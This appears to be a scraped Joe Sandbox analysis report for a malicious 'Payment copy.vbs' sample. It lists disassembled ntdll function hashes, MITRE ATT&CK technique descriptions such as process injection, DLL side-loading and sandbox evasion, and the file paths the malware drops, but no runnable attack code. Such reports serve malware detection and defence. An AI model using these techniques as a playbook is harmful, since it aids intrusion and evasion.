Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bef58aa0b96afd5de8d027cd70fbade522f06dd58b45d2f003bfcad1a90af051
Instruction ID: dd5e87d99711d481182f52912320358b92d6cc2748fdffca6091e6db13d064e2
Opcode Fuzzy Hash: bef58aa0b96afd5de8d027cd70fbade522f06dd58b45d2f003bfcad1a90af051
Instruction Fuzzy Hash: 4590027120108802D5107558890474B00058BD0315F55C915A441465CDCAA588917121

Function 02C32B00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32B0A

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f32b41454b67cd0ca5cecf718ae8311097c93aa0fe0a6e12339ab6c2b2b584a8
Instruction ID: 14460f3edae24e7633205fc024285b41eebe69cf12889c999828397b4a3dac04
Opcode Fuzzy Hash: f32b41454b67cd0ca5cecf718ae8311097c93aa0fe0a6e12339ab6c2b2b584a8
Instruction Fuzzy Hash: 2990027120504842D54075584904A4700158BD0319F51C515A0054698DDA358D55B661

Function 02C32B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32B1A

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ee122725540dadaa758324398b7bab8962c4d07936d40e885c1718b86973194
Instruction ID: 7abadbd518e584dd3a8e962d2e466498cbf99ff9c792dfaff67ab1f6e391131d
Opcode Fuzzy Hash: 7ee122725540dadaa758324398b7bab8962c4d07936d40e885c1718b86973194
Instruction Fuzzy Hash: 9590027120100802D5807558490464B00058BD1315F91C519A0015658DCE258A5977A1

Function 02C32E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32E5A

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dfa5675a25a4441c716eca4e2d972aba62facfca604ed959e466226b3ede06fc
Instruction ID: 2fe3053a587471eabc9a54b0c23251803fb51426c4550a9a48d3f1d03f4ace30
Opcode Fuzzy Hash: dfa5675a25a4441c716eca4e2d972aba62facfca604ed959e466226b3ede06fc
Instruction Fuzzy Hash: 1F9002A134100442D50075584914B070005CBE1315F51C519E1054558DCA29CC527126

Function 02C32CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32CFA

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 707da49611abdeb7a883083f8017b8c84c2f7c6050f2a1efd24e359e59bbeb57
Instruction ID: f204516079d4dd21624e96d530c76bb5d8983fc3b4cb6d610c9046e044044d29
Opcode Fuzzy Hash: 707da49611abdeb7a883083f8017b8c84c2f7c6050f2a1efd24e359e59bbeb57
Instruction Fuzzy Hash: D7900261242041525945B558490450740069BE0255791C516A1404954CC9369856E621

Function 02C32C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32C3A

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 053d32728c8bee1405850040ae35f23bc3bfc07aa2ecac8cdb1fbc5138b2d1cd
Instruction ID: b81086c5b85298e1f3eb3d9a2b20094f927c05062de23827f998cc0cf41bb0cd
Opcode Fuzzy Hash: 053d32728c8bee1405850040ae35f23bc3bfc07aa2ecac8cdb1fbc5138b2d1cd
Instruction Fuzzy Hash: 8190026921300002D5807558590860B00058BD1216F91D919A000555CCCD2588696321

Function 02C32D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32D1A

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b7e70c7088e94cd16bda471b2953b302e413e06f4c0e395c9cad17ff651ac88
Instruction ID: d131d6a7cb0fac67afdcb3ebab64b62aeb404dfd26c16508eab2e76c36fc3869
Opcode Fuzzy Hash: 8b7e70c7088e94cd16bda471b2953b302e413e06f4c0e395c9cad17ff651ac88
Instruction Fuzzy Hash: 6590027120100413D51175584A0470700098BD0255F91C916A041455CDDA668952B121

Function 02C32B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02C32B44

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de54e19f293380966c86951364c09256602dea787d1b6ce6a8066d069455dda3
Instruction ID: 9a85b3127631df9ffbc509dd1d4c8d03a3b8e3bb4345655fd0d754c982afc928
Opcode Fuzzy Hash: de54e19f293380966c86951364c09256602dea787d1b6ce6a8066d069455dda3
Instruction Fuzzy Hash: 21B092B29024C5CAEE12EB704B08B1B7A00ABD0719F26C966E2470685E8B38C591F276

Non-executed Functions

Function 02C27550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02C64507
CLIENT(ntdll): Processing section info %ws..., xrefs: 02C64592
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02C64530
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02C6454D
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02C64460
ExecuteOptions, xrefs: 02C644AB
Execute=1, xrefs: 02C6451E

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 6d6a32dd8c2aac43f1f4d5fe1213e2f4c2d0d462eed80db60e0d8761a1959d00
Instruction ID: 11e5d0fca10144814b2370e4854ba5de9bd8965e6cd41ac0bde0d64193c03433
Opcode Fuzzy Hash: 6d6a32dd8c2aac43f1f4d5fe1213e2f4c2d0d462eed80db60e0d8761a1959d00
Instruction Fuzzy Hash: 7751F931A00229AAEF25AA95DCC9FFDB3ADAF44304F1405E9E505A7181EB709B4DCF50

Function 02BF9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 02BF90B1
@, xrefs: 02BF9095

Memory Dump Source

Source File: 00000004.00000002.15052094052.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: true

Associated: 00000004.00000002.15052094052.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.15052094052.0000000002CED000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2bc0000_cmdkey.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: e11194b38e0cfa302b4cc89ac841ae8bc165f5e33dd055a0aaf97fd5ad98773c
Instruction ID: eed77a939c2496577b3ea0f3c054f1ea2909d085c717fe37ccc1e9b7eb0e626b
Opcode Fuzzy Hash: e11194b38e0cfa302b4cc89ac841ae8bc165f5e33dd055a0aaf97fd5ad98773c
Instruction Fuzzy Hash: 70812A72D002699BDB31CB54CC45BEEB6B9AF48714F0041EAEA09B7280D7709E85DFA5

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment copy.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Ankelknogle.Bil

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Beslaas.fly

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Omarbejdelsers.Vej

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Polaristic\bordtennisspillere.txt

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Polaristic\falsework.pal

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit\halvdagsstillingerne.run

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit\inshrine.dis

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit\overreacted.ins

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\blepharostat.str

C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll

C:\Users\user\AppData\Local\Temp\temp_executable.exe

Static File Info

General

File Icon

Windows Analysis Report
Payment copy.vbs

Function 004030E2 Relevance: 77.3, APIs: 27, Strings: 17, Instructions: 324
stringfilecomCOMMON

Function 00405BB3 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Function 00405451 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 0040231C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
comCOMMON

Function 0040361A Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00402C29 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402E62 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
fileCOMMON

Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
COMMON

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Function 00405851 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 100016DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON